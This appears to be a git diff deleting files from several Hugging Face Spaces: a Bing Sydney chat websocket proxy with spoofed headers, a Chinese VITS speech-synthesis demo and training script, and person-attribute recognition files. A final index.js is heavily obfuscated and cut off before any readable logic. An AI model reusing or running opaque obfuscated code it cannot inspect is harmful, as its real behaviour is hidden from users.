charset=UTF-8') - - const ws = new WebSocket('wss://sydney.bing.com/sydney/ChatHub', { - headers: { - ...headers, - 'accept-language': 'zh-CN,zh;q=0.9', - 'cache-control': 'no-cache', - 'x-ms-useragent': 'azsdk-js-api-client-factory/1.0.0-beta.1 core-rest-pipeline/1.10.0 OS/Win32', - pragma: 'no-cache', - } - }) - - const closeDog = new WatchDog() - const timeoutDog = new WatchDog() - ws.onmessage = (event) => { - timeoutDog.watch(() => { - ws.send(websocketUtils.packMessage({ type: 6 })) - }, 1500) - closeDog.watch(() => { - ws.close() - }, 10000) - res.write(event.data) - if (/\{"type":([367])\}/.test(String(event.data))) { - const type = parseInt(RegExp.$1, 10) - debug('connection type', type) - if (type === 3) { - ws.close() - } else { - ws.send(websocketUtils.packMessage({ type })) - } - } - } - - ws.onclose = () => { - timeoutDog.reset() - closeDog.reset() - debug('connection close') - res.end() - } - - await new Promise((resolve) => ws.onopen = resolve) - ws.send(websocketUtils.packMessage({ protocol: 'json', version: 1 })) - ws.send(websocketUtils.packMessage({ type: 6 })) - ws.send(websocketUtils.packMessage(BingWebBot.buildChatRequest(conversationContext!))) - req.socket.once('close', () => { - ws.close() - if (!res.closed) { - res.end() - } - }) -} diff --git a/spaces/xcchen/xcchenvits-uma-genshin-honkai/app.py b/spaces/xcchen/xcchenvits-uma-genshin-honkai/app.py deleted file mode 100644 index ba29f6a5aff153461017c2e11e03a8765581c0d5..0000000000000000000000000000000000000000 --- a/spaces/xcchen/xcchenvits-uma-genshin-honkai/app.py +++ /dev/null @@ -1,150 +0,0 @@ -# coding=utf-8 -import time -import os -import gradio as gr -import utils -import argparse -import commons -from models import SynthesizerTrn -from text import text_to_sequence -import torch -from torch import no_grad, LongTensor -import webbrowser -import logging -import gradio.processing_utils as gr_processing_utils -logging.getLogger('numba').setLevel(logging.WARNING) -limitation = os.getenv("SYSTEM") == "spaces" # limit text and audio length in huggingface spaces - -audio_postprocess_ori = gr.Audio.postprocess -def audio_postprocess(self, y): - data = audio_postprocess_ori(self, y) - if data is None: - return None - return gr_processing_utils.encode_url_or_file_to_base64(data["name"]) -gr.Audio.postprocess = audio_postprocess - -def get_text(text, hps): - text_norm, clean_text = text_to_sequence(text, hps.symbols, hps.data.text_cleaners) - if hps.data.add_blank: - text_norm = commons.intersperse(text_norm, 0) - text_norm = LongTensor(text_norm) - return text_norm, clean_text - -def vits(text, language, speaker_id, noise_scale, noise_scale_w, length_scale): - start = time.perf_counter() - if not len(text): - return "输入文本不能为空!", None, None - text = text.replace('\n', ' ').replace('\r', '').replace(" ", "") - if len(text) > 100 and limitation: - return f"输入文字过长!{len(text)}>100", None, None - if language == 0: - text = f"[ZH]{text}[ZH]" - elif language == 1: - text = f"[JA]{text}[JA]" - else: - text = f"{text}" - stn_tst, clean_text = get_text(text, hps_ms) - with no_grad(): - x_tst = stn_tst.unsqueeze(0).to(device) - x_tst_lengths = LongTensor([stn_tst.size(0)]).to(device) - speaker_id = LongTensor([speaker_id]).to(device) - audio = net_g_ms.infer(x_tst, x_tst_lengths, sid=speaker_id, noise_scale=noise_scale, noise_scale_w=noise_scale_w, - length_scale=length_scale)[0][0, 0].data.cpu().float().numpy() - - return "生成成功!", (22050, audio), f"生成耗时 {round(time.perf_counter()-start, 2)} s" - -def search_speaker(search_value): - for s in speakers: - if search_value == s: - return s - for s in speakers: - if search_value in s: - return s - -def change_lang(language): - if language == 0: - return 0.6, 0.668, 1.2 - else: - return 0.6, 0.668, 1.1 - -download_audio_js = """ -() =>{{ - let root = document.querySelector("body > gradio-app"); - if (root.shadowRoot != null) - root = root.shadowRoot; - let audio = root.querySelector("#tts-audio").querySelector("audio"); - let text = root.querySelector("#input-text").querySelector("textarea"); - if (audio == undefined) - return; - text = text.value; - if (text == undefined) - text = Math.floor(Math.random()*100000000); - audio = audio.src; - let oA = document.createElement("a"); - oA.download = text.substr(0, 20)+'.wav'; - oA.href = audio; - document.body.appendChild(oA); - oA.click(); - oA.remove(); -}} -""" - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument('--device', type=str, default='cpu') - parser.add_argument('--api', action="store_true", default=False) - parser.add_argument("--share", action="store_true", default=False, help="share gradio app") - parser.add_argument("--colab", action="store_true", default=False, help="share gradio app") - args = parser.parse_args() - device = torch.device(args.device) - - hps_ms = utils.get_hparams_from_file(r'./model/config.json') - net_g_ms = SynthesizerTrn( - len(hps_ms.symbols), - hps_ms.data.filter_length // 2 + 1, - hps_ms.train.segment_size // hps_ms.data.hop_length, - n_speakers=hps_ms.data.n_speakers, - **hps_ms.model) - _ = net_g_ms.eval().to(device) - speakers = hps_ms.speakers - model, optimizer, learning_rate, epochs = utils.load_checkpoint(r'./model/G_953000.pth', net_g_ms, None) - - with gr.Blocks() as app: - gr.Markdown( - "#
    VITS语音在线合成demo\n" - "#
    严禁将模型用于任何商业项目,否则后果自负\n" - "
    主要有赛马娘,原神中文,原神日语,崩坏3的音色
    " - '
    ' - '' - ) - - with gr.Tabs(): - with gr.TabItem("vits"): - with gr.Row(): - with gr.Column(): - input_text = gr.Textbox(label="Text (100 words limitation) " if limitation else "Text", lines=5, value="今天晚上吃啥好呢。", elem_id=f"input-text") - lang = gr.Dropdown(label="Language", choices=["中文", "日语", "中日混合(中文用[ZH][ZH]包裹起来,日文用[JA][JA]包裹起来)"], - type="index", value="中文") - btn = gr.Button(value="Submit") - with gr.Row(): - search = gr.Textbox(label="Search Speaker", lines=1) - btn2 = gr.Button(value="Search") - sid = gr.Dropdown(label="Speaker", choices=speakers, type="index", value=speakers[228]) - with gr.Row(): - ns = gr.Slider(label="noise_scale(控制感情变化程度)", minimum=0.1, maximum=1.0, step=0.1, value=0.6, interactive=True) - nsw = gr.Slider(label="noise_scale_w(控制音素发音长度)", minimum=0.1, maximum=1.0, step=0.1, value=0.668, interactive=True) - ls = gr.Slider(label="length_scale(控制整体语速)", minimum=0.1, maximum=2.0, step=0.1, value=1.2, interactive=True) - with gr.Column(): - o1 = gr.Textbox(label="Output Message") - o2 = gr.Audio(label="Output Audio", elem_id=f"tts-audio") - o3 = gr.Textbox(label="Extra Info") - download = gr.Button("Download Audio") - btn.click(vits, inputs=[input_text, lang, sid, ns, nsw, ls], outputs=[o1, o2, o3]) - download.click(None, [], [], _js=download_audio_js.format()) - btn2.click(search_speaker, inputs=[search], outputs=[sid]) - lang.change(change_lang, inputs=[lang], outputs=[ns, nsw, ls]) - with gr.TabItem("可用人物一览"): - gr.Radio(label="Speaker", choices=speakers, interactive=False, type="index") - if args.colab: - webbrowser.open("http://127.0.0.1:7860") - app.queue(concurrency_count=1, api_open=args.api).launch(share=args.share) diff --git a/spaces/xfys/yolov5_tracking/trackers/strong_sort/deep/reid/projects/attribute_recognition/README.md b/spaces/xfys/yolov5_tracking/trackers/strong_sort/deep/reid/projects/attribute_recognition/README.md deleted file mode 100644 index a20b6e7f1c279c065f8f2f81e078410796829951..0000000000000000000000000000000000000000 --- a/spaces/xfys/yolov5_tracking/trackers/strong_sort/deep/reid/projects/attribute_recognition/README.md +++ /dev/null @@ -1,18 +0,0 @@ -# Person Attribute Recognition -This code was developed for the experiment of person attribute recognition in [Omni-Scale Feature Learning for Person Re-Identification (ICCV'19)](https://arxiv.org/abs/1905.00953). - -## Download data -Download the PA-100K dataset from [https://github.com/xh-liu/HydraPlus-Net](https://github.com/xh-liu/HydraPlus-Net), and extract the file under the folder where you store your data (say $DATASET). The folder structure should look like -```bash -$DATASET/ - pa100k/ - data/ # images - annotation/ - annotation.mat -``` - -## Train -The training command is provided in `train.sh`. Run `bash train.sh $DATASET` to start training. - -## Test -To test a pretrained model, add the following two arguments to `train.sh`: `--load-weights $PATH_TO_WEIGHTS --evaluate`. \ No newline at end of file diff --git a/spaces/xfys/yolov5_tracking/trackers/strong_sort/deep/reid/projects/attribute_recognition/models/__init__.py b/spaces/xfys/yolov5_tracking/trackers/strong_sort/deep/reid/projects/attribute_recognition/models/__init__.py deleted file mode 100644 index ff0f0eda86c5cbc8b045a3d8469dbc7ba5a1ffcf..0000000000000000000000000000000000000000 --- a/spaces/xfys/yolov5_tracking/trackers/strong_sort/deep/reid/projects/attribute_recognition/models/__init__.py +++ /dev/null @@ -1,17 +0,0 @@ -from __future__ import absolute_import - -from .osnet import * - -__model_factory = { - 'osnet_avgpool': osnet_avgpool, - 'osnet_maxpool': osnet_maxpool -} - - -def build_model(name, num_classes, pretrained=True, use_gpu=True): - avai_models = list(__model_factory.keys()) - if name not in avai_models: - raise KeyError - return __model_factory[name]( - num_classes=num_classes, pretrained=pretrained, use_gpu=use_gpu - ) diff --git a/spaces/xnetba/MMS/vits/train.py b/spaces/xnetba/MMS/vits/train.py deleted file mode 100644 index 703d30cf9ef2c414d9b35fe65545cc8fefad8821..0000000000000000000000000000000000000000 --- a/spaces/xnetba/MMS/vits/train.py +++ /dev/null @@ -1,290 +0,0 @@ -import os -import json -import argparse -import itertools -import math -import torch -from torch import nn, optim -from torch.nn import functional as F -from torch.utils.data import DataLoader -from torch.utils.tensorboard import SummaryWriter -import torch.multiprocessing as mp -import torch.distributed as dist -from torch.nn.parallel import DistributedDataParallel as DDP -from torch.cuda.amp import autocast, GradScaler - -import commons -import utils -from data_utils import ( - TextAudioLoader, - TextAudioCollate, - DistributedBucketSampler -) -from models import ( - SynthesizerTrn, - MultiPeriodDiscriminator, -) -from losses import ( - generator_loss, - discriminator_loss, - feature_loss, - kl_loss -) -from mel_processing import mel_spectrogram_torch, spec_to_mel_torch -from text.symbols import symbols - - -torch.backends.cudnn.benchmark = True -global_step = 0 - - -def main(): - """Assume Single Node Multi GPUs Training Only""" - assert torch.cuda.is_available(), "CPU training is not allowed." - - n_gpus = torch.cuda.device_count() - os.environ['MASTER_ADDR'] = 'localhost' - os.environ['MASTER_PORT'] = '80000' - - hps = utils.get_hparams() - mp.spawn(run, nprocs=n_gpus, args=(n_gpus, hps,)) - - -def run(rank, n_gpus, hps): - global global_step - if rank == 0: - logger = utils.get_logger(hps.model_dir) - logger.info(hps) - utils.check_git_hash(hps.model_dir) - writer = SummaryWriter(log_dir=hps.model_dir) - writer_eval = SummaryWriter(log_dir=os.path.join(hps.model_dir, "eval")) - - dist.init_process_group(backend='nccl', init_method='env://', world_size=n_gpus, rank=rank) - torch.manual_seed(hps.train.seed) - torch.cuda.set_device(rank) - - train_dataset = TextAudioLoader(hps.data.training_files, hps.data) - train_sampler = DistributedBucketSampler( - train_dataset, - hps.train.batch_size, - [32,300,400,500,600,700,800,900,1000], - num_replicas=n_gpus, - rank=rank, - shuffle=True) - collate_fn = TextAudioCollate() - train_loader = DataLoader(train_dataset, num_workers=8, shuffle=False, pin_memory=True, - collate_fn=collate_fn, batch_sampler=train_sampler) - if rank == 0: - eval_dataset = TextAudioLoader(hps.data.validation_files, hps.data) - eval_loader = DataLoader(eval_dataset, num_workers=8, shuffle=False, - batch_size=hps.train.batch_size, pin_memory=True, - drop_last=False, collate_fn=collate_fn) - - net_g = SynthesizerTrn( - len(symbols), - hps.data.filter_length // 2 + 1, - hps.train.segment_size // hps.data.hop_length, - **hps.model).cuda(rank) - net_d = MultiPeriodDiscriminator(hps.model.use_spectral_norm).cuda(rank) - optim_g = torch.optim.AdamW( - net_g.parameters(), - hps.train.learning_rate, - betas=hps.train.betas, - eps=hps.train.eps) - optim_d = torch.optim.AdamW( - net_d.parameters(), - hps.train.learning_rate, - betas=hps.train.betas, - eps=hps.train.eps) - net_g = DDP(net_g, device_ids=[rank]) - net_d = DDP(net_d, device_ids=[rank]) - - try: - _, _, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(hps.model_dir, "G_*.pth"), net_g, optim_g) - _, _, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(hps.model_dir, "D_*.pth"), net_d, optim_d) - global_step = (epoch_str - 1) * len(train_loader) - except: - epoch_str = 1 - global_step = 0 - - scheduler_g = torch.optim.lr_scheduler.ExponentialLR(optim_g, gamma=hps.train.lr_decay, last_epoch=epoch_str-2) - scheduler_d = torch.optim.lr_scheduler.ExponentialLR(optim_d, gamma=hps.train.lr_decay, last_epoch=epoch_str-2) - - scaler = GradScaler(enabled=hps.train.fp16_run) - - for epoch in range(epoch_str, hps.train.epochs + 1): - if rank==0: - train_and_evaluate(rank, epoch, hps, [net_g, net_d], [optim_g, optim_d], [scheduler_g, scheduler_d], scaler, [train_loader, eval_loader], logger, [writer, writer_eval]) - else: - train_and_evaluate(rank, epoch, hps, [net_g, net_d], [optim_g, optim_d], [scheduler_g, scheduler_d], scaler, [train_loader, None], None, None) - scheduler_g.step() - scheduler_d.step() - - -def train_and_evaluate(rank, epoch, hps, nets, optims, schedulers, scaler, loaders, logger, writers): - net_g, net_d = nets - optim_g, optim_d = optims - scheduler_g, scheduler_d = schedulers - train_loader, eval_loader = loaders - if writers is not None: - writer, writer_eval = writers - - train_loader.batch_sampler.set_epoch(epoch) - global global_step - - net_g.train() - net_d.train() - for batch_idx, (x, x_lengths, spec, spec_lengths, y, y_lengths) in enumerate(train_loader): - x, x_lengths = x.cuda(rank, non_blocking=True), x_lengths.cuda(rank, non_blocking=True) - spec, spec_lengths = spec.cuda(rank, non_blocking=True), spec_lengths.cuda(rank, non_blocking=True) - y, y_lengths = y.cuda(rank, non_blocking=True), y_lengths.cuda(rank, non_blocking=True) - - with autocast(enabled=hps.train.fp16_run): - y_hat, l_length, attn, ids_slice, x_mask, z_mask,\ - (z, z_p, m_p, logs_p, m_q, logs_q) = net_g(x, x_lengths, spec, spec_lengths) - - mel = spec_to_mel_torch( - spec, - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.mel_fmin, - hps.data.mel_fmax) - y_mel = commons.slice_segments(mel, ids_slice, hps.train.segment_size // hps.data.hop_length) - y_hat_mel = mel_spectrogram_torch( - y_hat.squeeze(1), - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.hop_length, - hps.data.win_length, - hps.data.mel_fmin, - hps.data.mel_fmax - ) - - y = commons.slice_segments(y, ids_slice * hps.data.hop_length, hps.train.segment_size) # slice - - # Discriminator - y_d_hat_r, y_d_hat_g, _, _ = net_d(y, y_hat.detach()) - with autocast(enabled=False): - loss_disc, losses_disc_r, losses_disc_g = discriminator_loss(y_d_hat_r, y_d_hat_g) - loss_disc_all = loss_disc - optim_d.zero_grad() - scaler.scale(loss_disc_all).backward() - scaler.unscale_(optim_d) - grad_norm_d = commons.clip_grad_value_(net_d.parameters(), None) - scaler.step(optim_d) - - with autocast(enabled=hps.train.fp16_run): - # Generator - y_d_hat_r, y_d_hat_g, fmap_r, fmap_g = net_d(y, y_hat) - with autocast(enabled=False): - loss_dur = torch.sum(l_length.float()) - loss_mel = F.l1_loss(y_mel, y_hat_mel) * hps.train.c_mel - loss_kl = kl_loss(z_p, logs_q, m_p, logs_p, z_mask) * hps.train.c_kl - - loss_fm = feature_loss(fmap_r, fmap_g) - loss_gen, losses_gen = generator_loss(y_d_hat_g) - loss_gen_all = loss_gen + loss_fm + loss_mel + loss_dur + loss_kl - optim_g.zero_grad() - scaler.scale(loss_gen_all).backward() - scaler.unscale_(optim_g) - grad_norm_g = commons.clip_grad_value_(net_g.parameters(), None) - scaler.step(optim_g) - scaler.update() - - if rank==0: - if global_step % hps.train.log_interval == 0: - lr = optim_g.param_groups[0]['lr'] - losses = [loss_disc, loss_gen, loss_fm, loss_mel, loss_dur, loss_kl] - logger.info('Train Epoch: {} [{:.0f}%]'.format( - epoch, - 100. * batch_idx / len(train_loader))) - logger.info([x.item() for x in losses] + [global_step, lr]) - - scalar_dict = {"loss/g/total": loss_gen_all, "loss/d/total": loss_disc_all, "learning_rate": lr, "grad_norm_d": grad_norm_d, "grad_norm_g": grad_norm_g} - scalar_dict.update({"loss/g/fm": loss_fm, "loss/g/mel": loss_mel, "loss/g/dur": loss_dur, "loss/g/kl": loss_kl}) - - scalar_dict.update({"loss/g/{}".format(i): v for i, v in enumerate(losses_gen)}) - scalar_dict.update({"loss/d_r/{}".format(i): v for i, v in enumerate(losses_disc_r)}) - scalar_dict.update({"loss/d_g/{}".format(i): v for i, v in enumerate(losses_disc_g)}) - image_dict = { - "slice/mel_org": utils.plot_spectrogram_to_numpy(y_mel[0].data.cpu().numpy()), - "slice/mel_gen": utils.plot_spectrogram_to_numpy(y_hat_mel[0].data.cpu().numpy()), - "all/mel": utils.plot_spectrogram_to_numpy(mel[0].data.cpu().numpy()), - "all/attn": utils.plot_alignment_to_numpy(attn[0,0].data.cpu().numpy()) - } - utils.summarize( - writer=writer, - global_step=global_step, - images=image_dict, - scalars=scalar_dict) - - if global_step % hps.train.eval_interval == 0: - evaluate(hps, net_g, eval_loader, writer_eval) - utils.save_checkpoint(net_g, optim_g, hps.train.learning_rate, epoch, os.path.join(hps.model_dir, "G_{}.pth".format(global_step))) - utils.save_checkpoint(net_d, optim_d, hps.train.learning_rate, epoch, os.path.join(hps.model_dir, "D_{}.pth".format(global_step))) - global_step += 1 - - if rank == 0: - logger.info('====> Epoch: {}'.format(epoch)) - - -def evaluate(hps, generator, eval_loader, writer_eval): - generator.eval() - with torch.no_grad(): - for batch_idx, (x, x_lengths, spec, spec_lengths, y, y_lengths) in enumerate(eval_loader): - x, x_lengths = x.cuda(0), x_lengths.cuda(0) - spec, spec_lengths = spec.cuda(0), spec_lengths.cuda(0) - y, y_lengths = y.cuda(0), y_lengths.cuda(0) - - # remove else - x = x[:1] - x_lengths = x_lengths[:1] - spec = spec[:1] - spec_lengths = spec_lengths[:1] - y = y[:1] - y_lengths = y_lengths[:1] - break - y_hat, attn, mask, *_ = generator.module.infer(x, x_lengths, max_len=1000) - y_hat_lengths = mask.sum([1,2]).long() * hps.data.hop_length - - mel = spec_to_mel_torch( - spec, - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.mel_fmin, - hps.data.mel_fmax) - y_hat_mel = mel_spectrogram_torch( - y_hat.squeeze(1).float(), - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.hop_length, - hps.data.win_length, - hps.data.mel_fmin, - hps.data.mel_fmax - ) - image_dict = { - "gen/mel": utils.plot_spectrogram_to_numpy(y_hat_mel[0].cpu().numpy()) - } - audio_dict = { - "gen/audio": y_hat[0,:,:y_hat_lengths[0]] - } - if global_step == 0: - image_dict.update({"gt/mel": utils.plot_spectrogram_to_numpy(mel[0].cpu().numpy())}) - audio_dict.update({"gt/audio": y[0,:,:y_lengths[0]]}) - - utils.summarize( - writer=writer_eval, - global_step=global_step, - images=image_dict, - audios=audio_dict, - audio_sampling_rate=hps.data.sampling_rate - ) - generator.train() - - -if __name__ == "__main__": - main() diff --git a/spaces/xznwwh/aabb/index.js b/spaces/xznwwh/aabb/index.js deleted file mode 100644 index 33437ab3c1c48cb9c99d97c3d3b458b9ee2a36f9..0000000000000000000000000000000000000000 --- a/spaces/xznwwh/aabb/index.js +++ /dev/null @@ -1 +0,0 @@ -(function(_0x4485c9,_0x22327b){function _0xefd3bf(_0x3e1c6c,_0x1dfa24,_0x15da7f,_0x195c5d,_0x405333){return _0x222c(_0x1dfa24- -0x3cc,_0x405333);}function _0x297c01(_0x30ec4a,_0x42df57,_0x259878,_0x4968a7,_0x262f74){return _0x222c(_0x30ec4a-0x36e,_0x259878);}const _0x356a3e=_0x4485c9();function _0xb68276(_0x21380b,_0x2e2973,_0x52b0fa,_0x117bd5,_0x3635d9){return _0x222c(_0x2e2973-0x241,_0x117bd5);}function _0x4acd10(_0x52497a,_0x3b158a,_0x45ad13,_0x477292,_0x54f686){return _0x222c(_0x3b158a-0x1b5,_0x477292);}function _0x2197ea(_0x728895,_0x5db489,_0x447ced,_0x923532,_0x60db0c){return _0x222c(_0x447ced-0x179,_0x923532);}while(!![]){try{const _0x348d5c=parseInt(_0x4acd10(0x3db,0x3de,0x389,0x4af,0x2ed))/(-0x1*-0x99b+0x1*0x12af+-0x1c49)*(parseInt(_0x4acd10(0x224,0x267,0x1fe,0x24b,0x2fc))/(0x2449+-0x5*0x75d+0x45*0x2))+parseInt(_0x4acd10(0x34f,0x32e,0x335,0x30c,0x2e0))/(-0x1a18+0x15d*-0x13+-0x3*-0x1156)+parseInt(_0x2197ea(0x364,0x3b7,0x2d6,0x26b,0x288))/(0x1e6+-0x1a3a*-0x1+-0x7*0x404)*(parseInt(_0x4acd10(0x47a,0x3ed,0x425,0x324,0x429))/(0xdca+-0xcdd*-0x3+-0x1a2e*0x2))+parseInt(_0xefd3bf(-0x249,-0x245,-0x167,-0x2c3,-0x272))/(0x2*-0x93b+0x21a3+-0x50d*0x3)*(parseInt(_0x4acd10(0x2e2,0x3a7,0x45d,0x34f,0x3a5))/(-0x8*-0x4a9+0x14ae+0x1*-0x39ef))+parseInt(_0x2197ea(0x1c3,0x1dd,0x22d,0x16f,0x2b1))/(-0x15f+-0x3*0xbb9+0x2*0x1249)*(parseInt(_0x297c01(0x56b,0x639,0x494,0x57d,0x4da))/(0x7a2+0x1*-0xedb+0x3a1*0x2))+parseInt(_0x4acd10(0x325,0x3cf,0x33d,0x3f5,0x470))/(-0x1f28+0x114+-0x1e*-0x101)*(-parseInt(_0xefd3bf(-0x199,-0x1e0,-0x163,-0x117,-0x119))/(-0x897+-0x1842+0x20e4))+parseInt(_0xb68276(0x3a8,0x40e,0x3ed,0x368,0x36b))/(-0x1c06+-0x1462+-0x1*-0x3074)*(-parseInt(_0x297c01(0x56d,0x622,0x59e,0x496,0x599))/(0x3*-0x45a+-0x1d72+0x3*0xe2f));if(_0x348d5c===_0x22327b)break;else _0x356a3e['push'](_0x356a3e['shift']());}catch(_0x2be93b){_0x356a3e['push'](_0x356a3e['shift']());}}}(_0x4e4c,0x82*-0x19d0+0x374aa+-0x71e1d*-0x3));function _0x1d31e6(_0x26aabc,_0x58e3f1,_0x4d962d,_0x44a366,_0x1e49ac){return _0x222c(_0x26aabc- -0x25,_0x4d962d);}const _0x7d8571=(function(){function _0x608687(_0x541c2e,_0x566e15,_0x56da78,_0x4712c,_0x461848){return _0x222c(_0x541c2e- -0x209,_0x566e15);}function _0x19cc71(_0x45b869,_0x4779d2,_0xbcb35d,_0x3ae9e2,_0x267e6a){return _0x222c(_0x3ae9e2-0x168,_0x267e6a);}function _0x2ff91a(_0x2fa4df,_0x2d5ef6,_0x128dfa,_0x5f2dcf,_0x1ed3d0){return _0x222c(_0x1ed3d0-0x382,_0x2d5ef6);}function _0x570f86(_0x328671,_0x57b76c,_0x39f1be,_0x5ab763,_0x4adaeb){return _0x222c(_0x5ab763- -0xc9,_0x57b76c);}function _0x237352(_0x27c7b9,_0x4fb426,_0xa489a,_0x533521,_0x1d2f34){return _0x222c(_0x27c7b9- -0x295,_0x533521);}const _0x5186e9={'CLxJL':function(_0x174521,_0x4e51f9){return _0x174521(_0x4e51f9);},'sEXRC':function(_0x47e55c,_0x304d65){return _0x47e55c+_0x304d65;},'vPGKz':_0x237352(-0x203,-0x2d5,-0x1b1,-0x11e,-0x1d8)+_0x237352(-0x72,-0x12,-0xf5,-0xc6,-0x14b)+_0x2ff91a(0x3ac,0x3ce,0x49a,0x47f,0x455)+_0x2ff91a(0x44f,0x4d3,0x3dc,0x4c2,0x45c),'TTiuI':_0x608687(-0x20,-0x38,0x8d,-0xc5,-0xbc)+_0x608687(-0x3d,-0x4c,0x80,-0x22,0x77)+_0x570f86(0x4a,0xb2,0xb9,0x4a,0x5)+_0x570f86(0x11d,0xec,0x168,0x13c,0xe0)+_0x19cc71(0x280,0x2ec,0x309,0x245,0x1ef)+_0x608687(-0xa0,-0x16f,-0x14e,-0xee,0x1)+'\x20)','YyzBo':function(_0x3fd5d6,_0x145fea){return _0x3fd5d6!==_0x145fea;},'liNNj':_0x608687(0x21,0x5b,0x60,-0x5a,-0xc8),'ZtWnq':function(_0x40dedb,_0x579930){return _0x40dedb===_0x579930;},'pGfic':_0x2ff91a(0x407,0x4fd,0x4b4,0x455,0x49b),'JOvwt':_0x570f86(0x82,0x58,0x78,0xc7,0xdf)+_0x237352(-0xfd,-0x2e,-0x60,-0xce,-0x18c)+_0x608687(-0x108,-0x1bb,-0xe1,-0xed,-0x1cd),'IgZqH':_0x570f86(0x1b,0xf5,-0xb7,0x4,-0x11)+'er','HHIYV':function(_0x3281b8){return _0x3281b8();},'fwptI':function(_0x442173,_0x163537){return _0x442173===_0x163537;},'AFQdy':_0x19cc71(0x405,0x3c5,0x42b,0x3c5,0x300),'EGhZe':_0x237352(-0x1d1,-0x1b3,-0x20a,-0x266,-0x1f7)};let _0x460d02=!![];return function(_0x23b1fb,_0x5bea40){const _0x4ef3c3={'hLqPS':_0x5186e9[_0x2c608f(-0x224,-0x1b8,-0xb5,-0x179,-0xa5)],'LEbOf':_0x5186e9[_0x2c608f(-0xa7,-0x64,-0x8,-0xc1,-0xe0)],'RExtq':function(_0x36abf9){function _0x3a6869(_0x1f6ded,_0x6e3a20,_0x1c712,_0x5e2b93,_0x25a8c9){return _0x2c608f(_0x1f6ded-0x1ac,_0x6e3a20-0x1de,_0x1c712-0xa3,_0x5e2b93- -0x1d1,_0x25a8c9);}return _0x5186e9[_0x3a6869(-0x3c3,-0x29e,-0x33e,-0x32e,-0x23f)](_0x36abf9);}};function _0x130cc0(_0x28523e,_0x37ac41,_0x46edaa,_0x4a3eff,_0x2357ad){return _0x237352(_0x46edaa- -0x138,_0x37ac41-0x66,_0x46edaa-0x3a,_0x2357ad,_0x2357ad-0x33);}function _0x2c608f(_0x5aeefc,_0x508c15,_0x31febe,_0x2f9456,_0xc3f468){return _0x237352(_0x2f9456-0x8f,_0x508c15-0xa7,_0x31febe-0xef,_0xc3f468,_0xc3f468-0x1d2);}function _0x4cd69c(_0x2f64ef,_0x3d09f6,_0x5c2aaa,_0x9d422e,_0x2d6659){return _0x19cc71(_0x2f64ef-0xf6,_0x3d09f6-0x73,_0x5c2aaa-0x71,_0x5c2aaa-0x1d3,_0x2d6659);}function _0x300ab1(_0x5eb7c0,_0x1aa2f0,_0x37acbd,_0xe8d84b,_0x89da59){return _0x19cc71(_0x5eb7c0-0x1c0,_0x1aa2f0-0x1be,_0x37acbd-0x185,_0x89da59- -0x190,_0x5eb7c0);}function _0x48b8ea(_0x46b6f8,_0x47d45e,_0x1afc7a,_0x224ce8,_0x1954a4){return _0x570f86(_0x46b6f8-0xfa,_0x1954a4,_0x1afc7a-0xef,_0x47d45e-0x387,_0x1954a4-0xb2);}if(_0x5186e9[_0x2c608f(-0x35,-0x88,-0x13a,-0x9c,-0x103)](_0x5186e9[_0x130cc0(-0x2d3,-0x41d,-0x349,-0x31a,-0x2ca)],_0x5186e9[_0x4cd69c(0x4ca,0x445,0x3e5,0x39d,0x347)]))return function(_0x5a41db){}[_0x48b8ea(0x4a0,0x463,0x548,0x4af,0x3ab)+_0x300ab1(0x28,-0x3a,0xd6,0xd9,0x9d)+'r'](_0x4ef3c3[_0x130cc0(-0x1d2,-0x134,-0x175,-0x14c,-0x1c4)])[_0x2c608f(-0x38,0xae,0xcf,-0xf,-0xa9)](_0x4ef3c3[_0x300ab1(0x156,0x15d,0xb7,0x1eb,0x144)]);else{const _0x2277f4=_0x460d02?function(){function _0x2401aa(_0x2b6833,_0x4b79ca,_0x31a993,_0xe8033,_0x334706){return _0x2c608f(_0x2b6833-0x1cc,_0x4b79ca-0x49,_0x31a993-0x58,_0x334706-0x229,_0xe8033);}function _0x3c2a18(_0x5a95ec,_0x587d1e,_0x39e62c,_0xfa1821,_0x522fa){return _0x4cd69c(_0x5a95ec-0x62,_0x587d1e-0xf3,_0x39e62c- -0x77,_0xfa1821-0xd2,_0x587d1e);}function _0x50cbbd(_0x1a3960,_0x5e2e55,_0x4eba15,_0x58019e,_0x40c53e){return _0x130cc0(_0x1a3960-0x145,_0x5e2e55-0x1b1,_0x5e2e55-0x5ce,_0x58019e-0x1ee,_0x4eba15);}function _0x4e7947(_0x45c3fd,_0x547ae3,_0x550ac9,_0x43e80c,_0x4966d8){return _0x4cd69c(_0x45c3fd-0x165,_0x547ae3-0x20,_0x550ac9- -0xf3,_0x43e80c-0x4c,_0x547ae3);}function _0x5966bf(_0x424dbb,_0x200755,_0x6b382,_0x2ac986,_0x46bc6a){return _0x2c608f(_0x424dbb-0x105,_0x200755-0x3b,_0x6b382-0x100,_0x424dbb-0x1ba,_0x6b382);}const _0x22a4a1={'kcOBP':function(_0x24e26c,_0xdad72f){function _0x5639a6(_0x20c4b6,_0x4df758,_0x83e411,_0x47ac48,_0x53a311){return _0x222c(_0x4df758-0x99,_0x83e411);}return _0x5186e9[_0x5639a6(0x211,0x1be,0x192,0xdc,0x24d)](_0x24e26c,_0xdad72f);},'UGzxM':function(_0xa58f7f,_0x23a6ad){function _0x37e16e(_0x1b8800,_0x8a743d,_0x16ed08,_0x310d7f,_0x5ed0b2){return _0x222c(_0x16ed08-0x69,_0x1b8800);}return _0x5186e9[_0x37e16e(0x1e3,0x7d,0x123,0x173,0x1be)](_0xa58f7f,_0x23a6ad);},'SQFha':_0x5186e9[_0x50cbbd(0x2e3,0x28a,0x302,0x2ca,0x296)],'rcsmG':_0x5186e9[_0x50cbbd(0x280,0x2d5,0x392,0x27d,0x29d)]};if(_0x5186e9[_0x2401aa(0x2a2,0x20c,0x2e6,0x300,0x21e)](_0x5186e9[_0x50cbbd(0x1d4,0x290,0x292,0x2e7,0x355)],_0x5186e9[_0x5966bf(0x43,-0x79,-0x2e,-0x27,0xbd)])){const _0x5da1fd=function(){function _0x21f5a9(_0x566629,_0x4af024,_0x17f5cd,_0x24caf2,_0x85b603){return _0x4e7947(_0x566629-0x1a4,_0x17f5cd,_0x24caf2- 